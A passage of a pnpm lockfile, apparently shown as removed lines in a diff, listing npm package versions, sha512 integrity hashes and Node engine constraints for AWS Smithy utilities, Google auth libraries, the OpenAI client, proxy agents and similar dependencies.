sha512-Rnq9vQWiR1+/I6NZZMNzJHV6pZYyEHt2ZnuV3MG8z2NNenC4i/8Kzttz7CjZiHSmsN5frhXhg17z3Zqjjhmz1A==} - engines: {node: '>=18.0.0'} - - '@smithy/property-provider@4.2.12': - resolution: {integrity: sha512-jqve46eYU1v7pZ5BM+fmkbq3DerkSluPr5EhvOcHxygxzD05ByDRppRwRPPpFrsFo5yDtCYLKu+kreHKVrvc7A==} - engines: {node: '>=18.0.0'} - - '@smithy/protocol-http@5.3.12': - resolution: {integrity: sha512-fit0GZK9I1xoRlR4jXmbLhoN0OdEpa96ul8M65XdmXnxXkuMxM0Y8HDT0Fh0Xb4I85MBvBClOzgSrV1X2s1Hxw==} - engines: {node: '>=18.0.0'} - - '@smithy/querystring-builder@4.2.12': - resolution: {integrity: sha512-6wTZjGABQufekycfDGMEB84BgtdOE/rCVTov+EDXQ8NHKTUNIp/j27IliwP7tjIU9LR+sSzyGBOXjeEtVgzCHg==} - engines: {node: '>=18.0.0'} - - '@smithy/querystring-parser@4.2.12': - resolution: {integrity: sha512-P2OdvrgiAKpkPNKlKUtWbNZKB1XjPxM086NeVhK+W+wI46pIKdWBe5QyXvhUm3MEcyS/rkLvY8rZzyUdmyDZBw==} - engines: {node: '>=18.0.0'} - - '@smithy/service-error-classification@4.2.12': - resolution: {integrity: sha512-LlP29oSQN0Tw0b6D0Xo6BIikBswuIiGYbRACy5ujw/JgWSzTdYj46U83ssf6Ux0GyNJVivs2uReU8pt7Eu9okQ==} - engines: {node: '>=18.0.0'} - - '@smithy/shared-ini-file-loader@4.4.7': - resolution: {integrity: sha512-HrOKWsUb+otTeo1HxVWeEb99t5ER1XrBi/xka2Wv6NVmTbuCUC1dvlrksdvxFtODLBjsC+PHK+fuy2x/7Ynyiw==} - engines: {node: '>=18.0.0'} - - '@smithy/signature-v4@5.3.12': - resolution: {integrity: sha512-B/FBwO3MVOL00DaRSXfXfa/TRXRheagt/q5A2NM13u7q+sHS59EOVGQNfG7DkmVtdQm5m3vOosoKAXSqn/OEgw==} - engines: {node: '>=18.0.0'} - - '@smithy/smithy-client@4.12.6': - resolution: {integrity: sha512-aib3f0jiMsJ6+cvDnXipBsGDL7ztknYSVqJs1FdN9P+u9tr/VzOR7iygSh6EUOdaBeMCMSh3N0VdyYsG4o91DQ==} - engines: {node: '>=18.0.0'} - - '@smithy/types@4.13.1': - resolution: {integrity: sha512-787F3yzE2UiJIQ+wYW1CVg2odHjmaWLGksnKQHUrK/lYZSEcy1msuLVvxaR/sI2/aDe9U+TBuLsXnr3vod1g0g==} - engines: {node: '>=18.0.0'} - - '@smithy/url-parser@4.2.12': - resolution: {integrity: 
sha512-wOPKPEpso+doCZGIlr+e1lVI6+9VAKfL4kZWFgzVgGWY2hZxshNKod4l2LXS3PRC9otH/JRSjtEHqQ/7eLciRA==} - engines: {node: '>=18.0.0'} - - '@smithy/util-base64@4.3.2': - resolution: {integrity: sha512-XRH6b0H/5A3SgblmMa5ErXQ2XKhfbQB+Fm/oyLZ2O2kCUrwgg55bU0RekmzAhuwOjA9qdN5VU2BprOvGGUkOOQ==} - engines: {node: '>=18.0.0'} - - '@smithy/util-body-length-browser@4.2.2': - resolution: {integrity: sha512-JKCrLNOup3OOgmzeaKQwi4ZCTWlYR5H4Gm1r2uTMVBXoemo1UEghk5vtMi1xSu2ymgKVGW631e2fp9/R610ZjQ==} - engines: {node: '>=18.0.0'} - - '@smithy/util-body-length-node@4.2.3': - resolution: {integrity: sha512-ZkJGvqBzMHVHE7r/hcuCxlTY8pQr1kMtdsVPs7ex4mMU+EAbcXppfo5NmyxMYi2XU49eqaz56j2gsk4dHHPG/g==} - engines: {node: '>=18.0.0'} - - '@smithy/util-buffer-from@2.2.0': - resolution: {integrity: sha512-IJdWBbTcMQ6DA0gdNhh/BwrLkDR+ADW5Kr1aZmd4k3DIF6ezMV4R2NIAmT08wQJ3yUK82thHWmC/TnK/wpMMIA==} - engines: {node: '>=14.0.0'} - - '@smithy/util-buffer-from@4.2.2': - resolution: {integrity: sha512-FDXD7cvUoFWwN6vtQfEta540Y/YBe5JneK3SoZg9bThSoOAC/eGeYEua6RkBgKjGa/sz6Y+DuBZj3+YEY21y4Q==} - engines: {node: '>=18.0.0'} - - '@smithy/util-config-provider@4.2.2': - resolution: {integrity: sha512-dWU03V3XUprJwaUIFVv4iOnS1FC9HnMHDfUrlNDSh4315v0cWyaIErP8KiqGVbf5z+JupoVpNM7ZB3jFiTejvQ==} - engines: {node: '>=18.0.0'} - - '@smithy/util-defaults-mode-browser@4.3.42': - resolution: {integrity: sha512-0vjwmcvkWAUtikXnWIUOyV6IFHTEeQUYh3JUZcDgcszF+hD/StAsQ3rCZNZEPHgI9kVNcbnyc8P2CBHnwgmcwg==} - engines: {node: '>=18.0.0'} - - '@smithy/util-defaults-mode-node@4.2.45': - resolution: {integrity: sha512-q5dOqqfTgUcLe38TAGiFn9srToKj2YCHJ34QGOLzM+xYLLA+qRZv7N+33kl1MERVusue36ZHnlNaNEvY/PzSrw==} - engines: {node: '>=18.0.0'} - - '@smithy/util-endpoints@3.3.3': - resolution: {integrity: sha512-VACQVe50j0HZPjpwWcjyT51KUQ4AnsvEaQ2lKHOSL4mNLD0G9BjEniQ+yCt1qqfKfiAHRAts26ud7hBjamrwig==} - engines: {node: '>=18.0.0'} - - '@smithy/util-hex-encoding@4.2.2': - resolution: {integrity: 
sha512-Qcz3W5vuHK4sLQdyT93k/rfrUwdJ8/HZ+nMUOyGdpeGA1Wxt65zYwi3oEl9kOM+RswvYq90fzkNDahPS8K0OIg==} - engines: {node: '>=18.0.0'} - - '@smithy/util-middleware@4.2.12': - resolution: {integrity: sha512-Er805uFUOvgc0l8nv0e0su0VFISoxhJ/AwOn3gL2NWNY2LUEldP5WtVcRYSQBcjg0y9NfG8JYrCJaYDpupBHJQ==} - engines: {node: '>=18.0.0'} - - '@smithy/util-retry@4.2.12': - resolution: {integrity: sha512-1zopLDUEOwumjcHdJ1mwBHddubYF8GMQvstVCLC54Y46rqoHwlIU+8ZzUeaBcD+WCJHyDGSeZ2ml9YSe9aqcoQ==} - engines: {node: '>=18.0.0'} - - '@smithy/util-stream@4.5.20': - resolution: {integrity: sha512-4yXLm5n/B5SRBR2p8cZ90Sbv4zL4NKsgxdzCzp/83cXw2KxLEumt5p+GAVyRNZgQOSrzXn9ARpO0lUe8XSlSDw==} - engines: {node: '>=18.0.0'} - - '@smithy/util-uri-escape@4.2.2': - resolution: {integrity: sha512-2kAStBlvq+lTXHyAZYfJRb/DfS3rsinLiwb+69SstC9Vb0s9vNWkRwpnj918Pfi85mzi42sOqdV72OLxWAISnw==} - engines: {node: '>=18.0.0'} - - '@smithy/util-utf8@2.3.0': - resolution: {integrity: sha512-R8Rdn8Hy72KKcebgLiv8jQcQkXoLMOGGv5uI1/k0l+snqkOzQ1R0ChUBCxWMlBsFMekWjq0wRudIweFs7sKT5A==} - engines: {node: '>=14.0.0'} - - '@smithy/util-utf8@4.2.2': - resolution: {integrity: sha512-75MeYpjdWRe8M5E3AW0O4Cx3UadweS+cwdXjwYGBW5h/gxxnbeZ877sLPX/ZJA9GVTlL/qG0dXP29JWFCD1Ayw==} - engines: {node: '>=18.0.0'} - - '@smithy/uuid@1.1.2': - resolution: {integrity: sha512-O/IEdcCUKkubz60tFbGA7ceITTAJsty+lBjNoorP4Z6XRqaFb/OjQjZODophEcuq68nKm6/0r+6/lLQ+XVpk8g==} - engines: {node: '>=18.0.0'} - - '@tootallnate/quickjs-emscripten@0.23.0': - resolution: {integrity: sha512-C5Mc6rdnsaJDjO3UpGW/CQTHtCKaYlScZTly4JIu97Jxo/odCiH0ITnDXSJPTOrEKk/ycSZ0AOgTmkDtkOsvIA==} - - '@types/node@25.5.0': - resolution: {integrity: sha512-jp2P3tQMSxWugkCUKLRPVUpGaL5MVFwF8RDuSRztfwgN1wmqJeMSbKlnEtQqU8UrhTmzEmZdu2I6v2dpp7XIxw==} - - '@types/retry@0.12.0': - resolution: {integrity: sha512-wWKOClTTiizcZhXnPY4wikVAwmdYHp8q6DmC+EJUzAMsycb7HB32Kh9RN4+0gExjmPmZSAQjgURXIGATPegAvA==} - - agent-base@7.1.4: - resolution: {integrity: 
sha512-MnA+YT8fwfJPgBx3m60MNqakm30XOkyIoH1y6huTQvC0PwZG7ki8NacLBcrPbNoo8vEZy7Jpuk7+jMO+CUovTQ==} - engines: {node: '>= 14'} - - ajv-formats@3.0.1: - resolution: {integrity: sha512-8iUql50EUR+uUcdRQ3HDqa6EVyo3docL8g5WJ3FNcWmu62IbkGUue/pEyLBW8VGKKucTPgqeks4fIU1DA4yowQ==} - peerDependencies: - ajv: ^8.0.0 - peerDependenciesMeta: - ajv: - optional: true - - ajv@8.18.0: - resolution: {integrity: sha512-PlXPeEWMXMZ7sPYOHqmDyCJzcfNrUr3fGNKtezX14ykXOEIvyK81d+qydx89KY5O71FKMPaQ2vBfBFI5NHR63A==} - - ansi-regex@5.0.1: - resolution: {integrity: sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==} - engines: {node: '>=8'} - - ansi-regex@6.2.2: - resolution: {integrity: sha512-Bq3SmSpyFHaWjPk8If9yc6svM8c56dB5BAtW4Qbw5jHTwwXXcTLoRMkpDJp6VL0XzlWaCHTXrkFURMYmD0sLqg==} - engines: {node: '>=12'} - - ansi-styles@4.3.0: - resolution: {integrity: sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==} - engines: {node: '>=8'} - - ansi-styles@6.2.3: - resolution: {integrity: sha512-4Dj6M28JB+oAH8kFkTLUo+a2jwOFkuqb3yucU0CANcRRUbxS0cP0nZYCGjcc3BNXwRIsUVmDGgzawme7zvJHvg==} - engines: {node: '>=12'} - - ast-types@0.13.4: - resolution: {integrity: sha512-x1FCFnFifvYDDzTaLII71vG5uvDwgtmDTEVWAxrgeiR8VjMONcCXJx7E+USjDtHlwFmt9MysbqgF9b9Vjr6w+w==} - engines: {node: '>=4'} - - balanced-match@1.0.2: - resolution: {integrity: sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==} - - base64-js@1.5.1: - resolution: {integrity: sha512-AKpaYlHn8t4SVbOHCy+b5+KKgvR4vrsD8vbvrbiQJps7fKDTkjkDry6ji0rUJjC0kzbNePLwzxq8iypo41qeWA==} - - basic-ftp@5.2.0: - resolution: {integrity: sha512-VoMINM2rqJwJgfdHq6RiUudKt2BV+FY5ZFezP/ypmwayk68+NzzAQy4XXLlqsGD4MCzq3DrmNFD/uUmBJuGoXw==} - engines: {node: '>=10.0.0'} - - bignumber.js@9.3.1: - resolution: {integrity: sha512-Ko0uX15oIUS7wJ3Rb30Fs6SkVbLmPBAKdlm7q9+ak9bbIeFf0MwuBsQV6z7+X768/cHsfg+WlysDWJcmthjsjQ==} - - bowser@2.14.1: - resolution: 
{integrity: sha512-tzPjzCxygAKWFOJP011oxFHs57HzIhOEracIgAePE4pqB3LikALKnSzUyU4MGs9/iCEUuHlAJTjTc5M+u7YEGg==} - - brace-expansion@2.0.2: - resolution: {integrity: sha512-Jt0vHyM+jmUBqojB7E1NIYadt0vI0Qxjxd2TErW94wDz+E2LAm5vKMXXwg6ZZBTHPuUlDgQHKXvjGBdfcF1ZDQ==} - - buffer-equal-constant-time@1.0.1: - resolution: {integrity: sha512-zRpUiDwd/xk6ADqPMATG8vc9VPrkck7T07OIx0gnjmJAnHnTVXNQG3vfvWNuiZIkwu9KrKdA1iJKfsfTVxE6NA==} - - chalk@5.6.2: - resolution: {integrity: sha512-7NzBL0rN6fMUW+f7A6Io4h40qQlG+xGmtMxfbnH/K7TAtt8JQWVQK+6g0UXKMeVJoyV5EkkNsErQ8pVD3bLHbA==} - engines: {node: ^12.17.0 || ^14.13 || >=16.0.0} - - color-convert@2.0.1: - resolution: {integrity: sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==} - engines: {node: '>=7.0.0'} - - color-name@1.1.4: - resolution: {integrity: sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==} - - cross-spawn@7.0.6: - resolution: {integrity: sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==} - engines: {node: '>= 8'} - - data-uri-to-buffer@4.0.1: - resolution: {integrity: sha512-0R9ikRb668HB7QDxT1vkpuUBtqc53YyAwMwGeUFKRojY/NWKvdZ+9UYtRfGmhqNbRkTSVpMbmyhXipFFv2cb/A==} - engines: {node: '>= 12'} - - data-uri-to-buffer@6.0.2: - resolution: {integrity: sha512-7hvf7/GW8e86rW0ptuwS3OcBGDjIi6SZva7hCyWC0yYry2cOPmLIjXAUHI6DK2HsnwJd9ifmt57i8eV2n4YNpw==} - engines: {node: '>= 14'} - - debug@4.4.3: - resolution: {integrity: sha512-RGwwWnwQvkVfavKVt22FGLw+xYSdzARwm0ru6DhTVA3umU5hZc28V3kO4stgYryrTlLpuvgI9GiijltAjNbcqA==} - engines: {node: '>=6.0'} - peerDependencies: - supports-color: '*' - peerDependenciesMeta: - supports-color: - optional: true - - degenerator@5.0.1: - resolution: {integrity: sha512-TllpMR/t0M5sqCXfj85i4XaAzxmS5tVA16dqvdkMwGmzI+dXLXnw3J+3Vdv7VKw+ThlTMboK6i9rnZ6Nntj5CQ==} - engines: {node: '>= 14'} - - eastasianwidth@0.2.0: - resolution: {integrity: 
sha512-I88TYZWc9XiYHRQ4/3c5rjjfgkjhLyW2luGIheGERbNQ6OY7yTybanSpDXZa8y7VUP9YmDcYa+eyq4ca7iLqWA==} - - ecdsa-sig-formatter@1.0.11: - resolution: {integrity: sha512-nagl3RYrbNv6kQkeJIpt6NJZy8twLB/2vtz6yN9Z4vRKHN4/QZJIEbqohALSgwKdnksuY3k5Addp5lg8sVoVcQ==} - - emoji-regex@8.0.0: - resolution: {integrity: sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==} - - emoji-regex@9.2.2: - resolution: {integrity: sha512-L18DaJsXSUk2+42pv8mLs5jJT2hqFkFE4j21wOmgbUqsZ2hL72NsUU785g9RXgo3s0ZNgVl42TiHp3ZtOv/Vyg==} - - escodegen@2.1.0: - resolution: {integrity: sha512-2NlIDTwUWJN0mRPQOdtQBzbUHvdGY2P1VXSyU83Q3xKxM7WHX2Ql8dKq782Q9TgQUNOLEzEYu9bzLNj1q88I5w==} - engines: {node: '>=6.0'} - hasBin: true - - esprima@4.0.1: - resolution: {integrity: sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==} - engines: {node: '>=4'} - hasBin: true - - estraverse@5.3.0: - resolution: {integrity: sha512-MMdARuVEQziNTeJD8DgMqmhwR11BRQ/cBP+pLtYdSTnf3MIO8fFeiINEbX36ZdNlfU/7A9f3gUw49B3oQsvwBA==} - engines: {node: '>=4.0'} - - esutils@2.0.3: - resolution: {integrity: sha512-kVscqXk4OCp68SZ0dkgEKVi6/8ij300KBWTJq32P/dYeWTSwK41WyTxalN1eRmA5Z9UU/LX9D7FWSmV9SAYx6g==} - engines: {node: '>=0.10.0'} - - extend@3.0.2: - resolution: {integrity: sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==} - - fast-deep-equal@3.1.3: - resolution: {integrity: sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==} - - fast-uri@3.1.0: - resolution: {integrity: sha512-iPeeDKJSWf4IEOasVVrknXpaBV0IApz/gp7S2bb7Z4Lljbl2MGJRqInZiUrQwV16cpzw/D3S5j5Julj/gT52AA==} - - fast-xml-builder@1.1.4: - resolution: {integrity: sha512-f2jhpN4Eccy0/Uz9csxh3Nu6q4ErKxf0XIsasomfOihuSUa3/xw6w8dnOtCDgEItQFJG8KyXPzQXzcODDrrbOg==} - - fast-xml-parser@5.4.1: - resolution: {integrity: sha512-BQ30U1mKkvXQXXkAGcuyUA/GA26oEB7NzOtsxCDtyu62sjGw5QraKFhx2Em3WQNjPw9PG6MQ9yuIIgkSDfGu5A==} - 
hasBin: true - - fetch-blob@3.2.0: - resolution: {integrity: sha512-7yAQpD2UMJzLi1Dqv7qFYnPbaPx7ZfFK6PiIxQ4PfkGPyNyl2Ugx+a/umUonmKqjhM4DnfbMvdX6otXq83soQQ==} - engines: {node: ^12.20 || >= 14.13} - - foreground-child@3.3.1: - resolution: {integrity: sha512-gIXjKqtFuWEgzFRJA9WCQeSJLZDjgJUOMCMzxtvFq/37KojM1BFGufqsCy0r4qSQmYLsZYMeyRqzIWOMup03sw==} - engines: {node: '>=14'} - - formdata-polyfill@4.0.10: - resolution: {integrity: sha512-buewHzMvYL29jdeQTVILecSaZKnt/RJWjoZCF5OW60Z67/GmSLBkOFM7qh1PI3zFNtJbaZL5eQu1vLfazOwj4g==} - engines: {node: '>=12.20.0'} - - gaxios@7.1.3: - resolution: {integrity: sha512-YGGyuEdVIjqxkxVH1pUTMY/XtmmsApXrCVv5EU25iX6inEPbV+VakJfLealkBtJN69AQmh1eGOdCl9Sm1UP6XQ==} - engines: {node: '>=18'} - - gcp-metadata@8.1.2: - resolution: {integrity: sha512-zV/5HKTfCeKWnxG0Dmrw51hEWFGfcF2xiXqcA3+J90WDuP0SvoiSO5ORvcBsifmx/FoIjgQN3oNOGaQ5PhLFkg==} - engines: {node: '>=18'} - - get-uri@6.0.5: - resolution: {integrity: sha512-b1O07XYq8eRuVzBNgJLstU6FYc1tS6wnMtF1I1D9lE8LxZSOGZ7LhxN54yPP6mGw5f2CkXY2BQUL9Fx41qvcIg==} - engines: {node: '>= 14'} - - glob@10.5.0: - resolution: {integrity: sha512-DfXN8DfhJ7NH3Oe7cFmu3NCu1wKbkReJ8TorzSAFbSKrlNaQSKfIzqYqVY8zlbs2NLBbWpRiU52GX2PbaBVNkg==} - deprecated: Old versions of glob are not supported, and contain widely publicized security vulnerabilities, which have been fixed in the current version. Please update. 
Support for old versions may be purchased (at exorbitant rates) by contacting i@izs.me - hasBin: true - - google-auth-library@10.6.1: - resolution: {integrity: sha512-5awwuLrzNol+pFDmKJd0dKtZ0fPLAtoA5p7YO4ODsDu6ONJUVqbYwvv8y2ZBO5MBNp9TJXigB19710kYpBPdtA==} - engines: {node: '>=18'} - - google-logging-utils@1.1.3: - resolution: {integrity: sha512-eAmLkjDjAFCVXg7A1unxHsLf961m6y17QFqXqAXGj/gVkKFrEICfStRfwUlGNfeCEjNRa32JEWOUTlYXPyyKvA==} - engines: {node: '>=14'} - - http-proxy-agent@7.0.2: - resolution: {integrity: sha512-T1gkAiYYDWYx3V5Bmyu7HcfcvL7mUrTWiM6yOfa3PIphViJ/gFPbvidQ+veqSOHci/PxBcDabeUNCzpOODJZig==} - engines: {node: '>= 14'} - - https-proxy-agent@7.0.6: - resolution: {integrity: sha512-vK9P5/iUfdl95AI+JVyUuIcVtd4ofvtrOr3HNtM2yxC9bnMbEdp3x01OhQNnjb8IJYi38VlTE3mBXwcfvywuSw==} - engines: {node: '>= 14'} - - ip-address@10.1.0: - resolution: {integrity: sha512-XXADHxXmvT9+CRxhXg56LJovE+bmWnEWB78LB83VZTprKTmaC5QfruXocxzTZ2Kl0DNwKuBdlIhjL8LeY8Sf8Q==} - engines: {node: '>= 12'} - - is-fullwidth-code-point@3.0.0: - resolution: {integrity: sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==} - engines: {node: '>=8'} - - isexe@2.0.0: - resolution: {integrity: sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==} - - jackspeak@3.4.3: - resolution: {integrity: sha512-OGlZQpz2yfahA/Rd1Y8Cd9SIEsqvXkLVoSw/cgwhnhFMDbsQFeZYoJJ7bIZBS9BcamUW96asq/npPWugM+RQBw==} - - json-bigint@1.0.0: - resolution: {integrity: sha512-SiPv/8VpZuWbvLSMtTDU8hEfrZWg/mH/nV/b4o0CYbSxu1UIQPLdwKOCIyLQX+VIPO5vrLX3i8qtqFyhdPSUSQ==} - - json-schema-to-ts@3.1.1: - resolution: {integrity: sha512-+DWg8jCJG2TEnpy7kOm/7/AxaYoaRbjVB4LFZLySZlWn8exGs3A4OLJR966cVvU26N7X9TWxl+Jsw7dzAqKT6g==} - engines: {node: '>=16'} - - json-schema-traverse@1.0.0: - resolution: {integrity: sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==} - - jwa@2.0.1: - resolution: {integrity: 
sha512-hRF04fqJIP8Abbkq5NKGN0Bbr3JxlQ+qhZufXVr0DvujKy93ZCbXZMHDL4EOtodSbCWxOqR8MS1tXA5hwqCXDg==} - - jws@4.0.1: - resolution: {integrity: sha512-EKI/M/yqPncGUUh44xz0PxSidXFr/+r0pA70+gIYhjv+et7yxM+s29Y+VGDkovRofQem0fs7Uvf4+YmAdyRduA==} - - long@5.3.2: - resolution: {integrity: sha512-mNAgZ1GmyNhD7AuqnTG3/VQ26o760+ZYBPKjPvugO8+nLbYfX6TVpJPseBvopbdY+qpZ/lKUnmEc1LeZYS3QAA==} - - lru-cache@10.4.3: - resolution: {integrity: sha512-JNAzZcXrCt42VGLuYz0zfAzDfAvJWW6AfYlDBQyDV5DClI2m5sAmK+OIO7s59XfsRsWHp02jAJrRadPRGTt6SQ==} - - lru-cache@7.18.3: - resolution: {integrity: sha512-jumlc0BIUrS3qJGgIkWZsyfAM7NCWiBcCDhnd+3NNM5KbBmLTgHVfWBcg6W+rLUsIpzpERPsvwUP7CckAQSOoA==} - engines: {node: '>=12'} - - minimatch@9.0.9: - resolution: {integrity: sha512-OBwBN9AL4dqmETlpS2zasx+vTeWclWzkblfZk7KTA5j3jeOONz/tRCnZomUyvNg83wL5Zv9Ss6HMJXAgL8R2Yg==} - engines: {node: '>=16 || 14 >=14.17'} - - minipass@7.1.3: - resolution: {integrity: sha512-tEBHqDnIoM/1rXME1zgka9g6Q2lcoCkxHLuc7ODJ5BxbP5d4c2Z5cGgtXAku59200Cx7diuHTOYfSBD8n6mm8A==} - engines: {node: '>=16 || 14 >=14.17'} - - ms@2.1.3: - resolution: {integrity: sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==} - - netmask@2.0.2: - resolution: {integrity: sha512-dBpDMdxv9Irdq66304OLfEmQ9tbNRFnFTuZiLo+bD+r332bBmMJ8GBLXklIXXgxd3+v9+KUnZaUR5PJMa75Gsg==} - engines: {node: '>= 0.4.0'} - - node-domexception@1.0.0: - resolution: {integrity: sha512-/jKZoMpw0F8GRwl4/eLROPA3cfcXtLApP0QzLmUT/HuPCZWyB7IY9ZrMeKw2O/nFIqPQB3PVM9aYm0F312AXDQ==} - engines: {node: '>=10.5.0'} - deprecated: Use your platform's native DOMException instead - - node-fetch@3.3.2: - resolution: {integrity: sha512-dRB78srN/l6gqWulah9SrxeYnxeddIG30+GOqK/9OlLVyLg3HPnr6SqOWTWOXKRwC2eGYCkZ59NNuSgvSrpgOA==} - engines: {node: ^12.20.0 || ^14.13.1 || >=16.0.0} - - openai@6.26.0: - resolution: {integrity: sha512-zd23dbWTjiJ6sSAX6s0HrCZi41JwTA1bQVs0wLQPZ2/5o2gxOJA5wh7yOAUgwYybfhDXyhwlpeQf7Mlgx8EOCA==} - hasBin: true - peerDependencies: - ws: ^8.18.0 - 
zod: ^3.25 || ^4.0 - peerDependenciesMeta: - ws: - optional: true - zod: - optional: true - - p-retry@4.6.2: - resolution: {integrity: sha512-312Id396EbJdvRONlngUx0NydfrIQ5lsYu0znKVUzVvArzEIt08V1qhtyESbGVd1FGX7UKtiFp5uwKZdM8wIuQ==} - engines: {node: '>=8'} - - pac-proxy-agent@7.2.0: - resolution: {integrity: sha512-TEB8ESquiLMc0lV8vcd5Ql/JAKAoyzHFXaStwjkzpOpC5Yv+pIzLfHvjTSdf3vpa2bMiUQrg9i6276yn8666aA==} - engines: {node: '>= 14'} - - pac-resolver@7.0.1: - resolution: {integrity: sha512-5NPgf87AT2STgwa2ntRMr45jTKrYBGkVU36yT0ig/n/GMAa3oPqhZfIQ2kMEimReg0+t9kZViDVZ83qfVUlckg==} - engines: {node: '>= 14'} - - package-json-from-dist@1.0.1: - resolution: {integrity: sha512-UEZIS3/by4OC8vL3P2dTXRETpebLI2NiI5vIrjaD/5UtrkFX/tNbwjTSRAGC/+7CAo2pIcBaRgWmcBBHcsaCIw==} - - path-expression-matcher@1.1.3: - resolution: {integrity: sha512-qdVgY8KXmVdJZRSS1JdEPOKPdTiEK/pi0RkcT2sw1RhXxohdujUlJFPuS1TSkevZ9vzd3ZlL7ULl1MHGTApKzQ==} - engines: {node: '>=14.0.0'} - - path-key@3.1.1: - resolution: {integrity: sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==} - engines: {node: '>=8'} - - path-scurry@1.11.1: - resolution: {integrity: sha512-Xa4Nw17FS9ApQFJ9umLiJS4orGjm7ZzwUrwamcGQuHSzDyth9boKDaycYdDcZDuqYATXw4HFXgaqWTctW/v1HA==} - engines: {node: '>=16 || 14 >=14.18'} - - protobufjs@7.5.4: - resolution: {integrity: sha512-CvexbZtbov6jW2eXAvLukXjXUW1TzFaivC46BpWc/3BpcCysb5Vffu+B3XHMm8lVEuy2Mm4XGex8hBSg1yapPg==} - engines: {node: '>=12.0.0'} - - proxy-agent@6.5.0: - resolution: {integrity: sha512-TmatMXdr2KlRiA2CyDu8GqR8EjahTG3aY3nXjdzFyoZbmB8hrBsTyMezhULIXKnC0jpfjlmiZ3+EaCzoInSu/A==} - engines: {node: '>= 14'} - - proxy-from-env@1.1.0: - resolution: {integrity: sha512-D+zkORCbA9f1tdWRK0RaCR3GPv50cMxcrz4X8k5LTSUD1Dkw47mKJEZQNunItRTkWwgtaUSo1RVFRIG9ZXiFYg==} - - require-from-string@2.0.2: - resolution: {integrity: sha512-Xf0nWe6RseziFMu+Ap9biiUbmplq6S9/p+7w7YXP/JBHhrUDDUhwa+vANyubuqfZWTveU//DYVGsDG7RKL/vEw==} - engines: {node: '>=0.10.0'} - - 
retry@0.13.1: - resolution: {integrity: sha512-XQBQ3I8W1Cge0Seh+6gjj03LbmRFWuoszgK9ooCpwYIrhhoO80pfq4cUkU5DkknwfOfFteRwlZ56PYOGYyFWdg==} - engines: {node: '>= 4'} - - rimraf@5.0.10: - resolution: {integrity: sha512-l0OE8wL34P4nJH/H2ffoaniAokM2qSmrtXHmlpvYr5AVVX8msAyW0l8NVJFDxlSK4u3Uh/f41cQheDVdnYijwQ==} - hasBin: true - - safe-buffer@5.2.1: - resolution: {integrity: sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==} - - shebang-command@2.0.0: - resolution: {integrity: sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==} - engines: {node: '>=8'} - - shebang-regex@3.0.0: - resolution: {integrity: sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==} - engines: {node: '>=8'} - - signal-exit@4.1.0: - resolution: {integrity: sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==} - engines: {node: '>=14'} - - smart-buffer@4.2.0: - resolution: {integrity: sha512-94hK0Hh8rPqQl2xXc3HsaBoOXKV20MToPkcXvwbISWLEs+64sBq5kFgn2kJDHb1Pry9yrP0dxrCI9RRci7RXKg==} - engines: {node: '>= 6.0.0', npm: '>= 3.0.0'} - - socks-proxy-agent@8.0.5: - resolution: {integrity: sha512-HehCEsotFqbPW9sJ8WVYB6UbmIMv7kUUORIF2Nncq4VQvBfNBLibW9YZR5dlYCSUhwcD628pRllm7n+E+YTzJw==} - engines: {node: '>= 14'} - - socks@2.8.7: - resolution: {integrity: sha512-HLpt+uLy/pxB+bum/9DzAgiKS8CX1EvbWxI4zlmgGCExImLdiad2iCwXT5Z4c9c3Eq8rP2318mPW2c+QbtjK8A==} - engines: {node: '>= 10.0.0', npm: '>= 3.0.0'} - - 